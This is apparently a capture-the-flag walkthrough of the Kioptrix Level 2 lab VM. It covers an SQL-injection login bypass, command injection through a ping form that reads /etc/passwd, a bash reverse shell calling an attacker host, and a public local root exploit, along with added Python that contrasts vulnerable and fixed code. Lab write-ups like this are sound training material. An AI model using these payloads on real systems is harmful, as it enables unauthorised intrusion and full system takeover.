Kioptrix level 2
Let's start with Nmap.
Command used: nmap -sC -sV 192.168.78.140
We've got a number of ports open.
I started with OpenSSH 3.9p1 and searched exploit-db, but couldn't find an exploit specific to that version.
Moving on to port 80, the web server. We are greeted by the following screen.
A login page. Let's run a brute force against it in the background and, meanwhile, try basic SQL injection on the authentication form.
With the username test and the password test' or 1=1#-- - we got in. The single quote closes the password string literal, or 1=1 makes the WHERE clause true for every row, and # (a MySQL comment marker) discards the rest of the original query, so the first user in the table is returned without a valid password.
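To make concrete what that payload does to the query, here is an added example in Python with an in-memory SQLite database; it is not code from the original post or from the Kioptrix VM. The users table, the admin/s3cret row and the query shape are assumptions standing in for the target's real schema. SQLite does not understand MySQL's # comment, so the payload here relies on the -- - comment that the page's payload also carries.

```python
import sqlite3

# Constructed stand-in for the target's user table (assumption: plaintext
# username/password columns, one privileged row).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Builds the query by string formatting, so the input is parsed as SQL.

    With password = "test' or 1=1-- -" the query becomes
      ... WHERE username='test' AND password='test' or 1=1-- -'
    AND binds tighter than OR, so the clause is (false) OR (true): every row
    matches and the first one, admin, is returned.
    """
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Parameter binding: the values never touch the SQL grammar, so a quote
    in the password is just a character inside a string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# The page's payload with MySQL's '#' dropped, because SQLite only knows the
# '--' comment form; the trailing '-- -' does the same job here.
PAYLOAD = "test' or 1=1-- -"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "test", PAYLOAD))  # admin
    print("safe:      ", login_safe(db, "test", PAYLOAD))        # None
```

The safe version is the one-line fix: bind the values instead of formatting them into the statement, and the same payload is just an incorrect password.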
What do we have here... a page that runs the ping command for us. ping is a system command, so the form input is probably being handed to a shell. Let's see whether we can chain a second command with ;
Yes. The input is not sanitised, so ; terminates ping and whatever follows runs as a new command. We run the following for system enumeration, looking for a way to get a shell:
whoami; hostname; cat /etc/passwd
which nc
which python
The results tell us there is no netcat on the machine, but bash and python are both present. Either can give us a reverse shell.
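The ping page's bug, and the fix a developer should have applied, as an added Python example; this is not the VM's own PHP code, which this post does not reproduce. The vulnerable function passes the target straight to a shell the way the page does; the hardened one accepts only a literal IP address and invokes ping without a shell. The `echo INJECTED` marker is a constructed stand-in for the enumeration commands above.

```python
import ipaddress
import subprocess

def ping_vulnerable(target):
    """Mirrors the Kioptrix ping page: the form value is spliced into a shell
    command line.  With shell=True a ';' ends the ping command and whatever
    follows runs as a second command with the web server's privileges."""
    result = subprocess.run(
        "ping -c 1 -W 1 " + target,
        shell=True, capture_output=True, text=True,
    )
    return result.stdout + result.stderr

def validate_target(target):
    """Allow-list check: only a syntactically valid IPv4/IPv6 address passes.
    Anything carrying shell metacharacters (; | & ` $ newline ...) fails the
    ip_address() parse and is rejected outright rather than escaped."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError("refusing non-address target: %r" % target)

def ping_safe(target):
    """Validated address handed to ping as one argv element, no shell involved,
    so even a hostile value could not be reinterpreted as shell syntax."""
    addr = validate_target(target)
    result = subprocess.run(
        ["ping", "-c", "1", "-W", "1", addr],
        capture_output=True, text=True,
    )
    return result.stdout + result.stderr

# Constructed attacker input: a valid-looking target followed by a second command.
INJECTED_INPUT = "127.0.0.1; echo INJECTED"

if __name__ == "__main__":
    print(ping_vulnerable(INJECTED_INPUT))   # ping output, then the word INJECTED
    try:
        ping_safe(INJECTED_INPUT)
    except ValueError as exc:
        print("blocked:", exc)
```

Rejecting rather than escaping is deliberate: an allow-list of the one input shape the page needs (an address) is far easier to get right than a deny-list of every shell metacharacter, and dropping the shell entirely removes the parser the injection relies on.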
Let's consult the pentestmonkey reverse shell cheat sheet. When there is no netcat, use bash:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Here 10.0.0.1 and 8080 are the cheat sheet's placeholders; replace them with the attacker machine's IP address and a port you are listening on. Because the payload goes through the web form, the & and > characters need to be URL-encoded if you send the request by hand (a browser form submission encodes them for you). Start a netcat listener on the chosen port on the attacker machine, submit the payload, and we pop a shell.
Time for the privilege escalation journey.
I searched for kernel exploits and tried a few, but they failed because the exploits' requirements were not met.
Then I searched for CentOS 4.5 and found two local privilege escalation exploits, exactly what we need.
Using the first one:
searchsploit -m exploits/linux_x86/local/9542.c
Download it on the attacker machine and transfer it to the victim: serve the file over HTTP from the attacker machine and fetch it with wget, which is available on the target.
Compile the exploit on the target, since GCC is installed there (a binary built against a modern distribution's glibc would likely not run on CentOS 4.5):
gcc 9542.c -o 9542
Make sure the compiled binary is executable (gcc normally sets this already):
chmod +x 9542
and execute it:
./9542
BINGO!!! We are root.
574r570rm